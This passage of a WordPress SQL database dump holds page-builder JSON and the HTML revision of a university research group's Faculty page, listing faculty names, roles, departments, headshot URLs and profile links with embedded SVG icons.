ontent\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c181\",\"index\":2,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c181\",\"index\":1,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c136\",\"parentId\":\"182-c135\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c135\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c188\",\"parentId\":\"182-c187\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c187\",\"parentId\":\"182-c186\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c186\",\"parentId\":\"182-c135\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-09-29 22:27:09','2023-09-30 02:27:09','',562,'https://gsudice.dataconn.net/?p=1625',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1626,1,'2023-09-29 22:27:09','2023-09-30 02:27:09','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c58\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c58 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c59-outer\">\n            <div data-colibri-id=\"182-c59\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c59 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-986 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg\" class=\"wp-image-629 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg\" class=\"wp-image-1409 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  